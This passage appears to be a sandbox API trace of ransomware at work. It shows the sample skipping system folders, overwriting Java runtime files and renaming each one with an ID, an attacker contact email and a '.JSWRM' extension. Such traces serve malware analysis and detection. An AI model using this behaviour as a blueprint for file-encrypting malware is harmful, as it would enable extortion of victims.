hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.024] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0070.024] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1e7d, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="splash_11-lic.gif", cAlternateFileName="SPLASH~2.GIF")) returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2=".") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="..") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="...") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="windows") returned -1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="recovery") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="perflogs") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="documents and settings") returned 1 [0070.024] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.025] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="system volume information") returned -1 [0070.025] lstrcmpiW (lpString1="splash_11-lic.gif", lpString2="msocache") returned 1 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11-lic.gif", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11-lic.gif", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash_11-lic.gif", lpUsedDefaultChar=0x0) returned 17 [0070.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11-lic.gif", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11-lic.gif", cchWideChar=17, lpMultiByteStr=0x2413d0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash_11-lic.gif", lpUsedDefaultChar=0x0) returned 17 [0070.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0070.025] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.025] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.025] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0070.025] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.026] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=7805) returned 1 [0070.026] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.026] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e70) returned 0x24e1e0 [0070.026] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x1e70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x1e70, lpOverlapped=0x0) returned 1 [0070.028] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.028] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x1e70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x1e70, lpOverlapped=0x0) returned 1 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.028] CloseHandle (hObject=0x458) returned 1 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0070.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.028] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.028] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.029] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11-lic.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225768 | out: hHeap=0x1e0000) returned 1 [0070.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0070.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.031] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0070.031] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2fda, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="splash_11@2x-lic.gif", cAlternateFileName="SPLASH~3.GIF")) returned 1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2=".") returned 1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="..") returned 1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="...") returned 1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="windows") returned -1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="recovery") returned 1 [0070.031] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="perflogs") returned 1 [0070.032] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="documents and settings") returned 1 [0070.032] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="$RECYCLE.BIN") returned 1 [0070.032] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="system volume information") returned -1 [0070.032] lstrcmpiW (lpString1="splash_11@2x-lic.gif", lpString2="msocache") returned 1 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11@2x-lic.gif", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11@2x-lic.gif", cchWideChar=20, lpMultiByteStr=0x241330, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash_11@2x-lic.gif", lpUsedDefaultChar=0x0) returned 20 [0070.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11@2x-lic.gif", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="splash_11@2x-lic.gif", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="splash_11@2x-lic.gif", lpUsedDefaultChar=0x0) returned 20 [0070.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0070.032] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.032] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0070.033] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.033] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=12250) returned 1 [0070.033] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.033] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2fd0) returned 0x24e1e0 [0070.033] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x2fd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x2fd0, lpOverlapped=0x0) returned 1 [0070.035] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.035] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x2fd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x2fd0, lpOverlapped=0x0) returned 1 [0070.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.035] CloseHandle (hObject=0x458) returned 1 [0070.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0070.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.035] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0070.035] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0070.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0070.036] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.036] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\splash_11@2x-lic.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0070.036] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b9204e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b9204e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2fda, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="splash_11@2x-lic.gif", cAlternateFileName="SPLASH~3.GIF")) returned 0 [0070.036] FindClose (in: hFindFile=0x231b00 | out: hFindFile=0x231b00) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233028 | out: hHeap=0x1e0000) returned 1 [0070.036] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0070.036] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8ed9405, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8ed9405, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa900a6f7, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4ce7de, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="deploy.jar", cAlternateFileName="")) returned 1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2=".") returned 1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="..") returned 1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="...") returned 1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="windows") returned -1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="recovery") returned -1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="perflogs") returned -1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="documents and settings") returned -1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="system volume information") returned -1 [0070.037] lstrcmpiW (lpString1="deploy.jar", lpString2="msocache") returned -1 [0070.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deploy.jar", lpUsedDefaultChar=0x0) returned 10 [0070.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0070.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.jar", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deploy.jar", lpUsedDefaultChar=0x0) returned 10 [0070.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0070.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0070.037] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232db8 | out: hHeap=0x1e0000) returned 1 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.037] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.037] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0070.037] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0070.038] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=5040094) returned 1 [0070.038] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.038] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0070.038] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0070.067] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.067] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0070.068] CloseHandle (hObject=0x454) returned 1 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a318 [0070.068] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a318, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a318 | out: hHeap=0x1e0000) returned 1 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0070.068] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0070.068] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.068] MoveFileW (lpExistingFileName="C:\\Program 